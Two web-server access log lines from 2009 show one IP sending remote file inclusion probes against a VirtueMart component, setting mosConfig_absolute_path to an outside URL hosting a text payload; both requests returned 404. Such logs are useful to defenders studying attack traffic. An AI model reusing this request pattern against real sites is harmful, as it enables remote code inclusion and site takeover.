81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
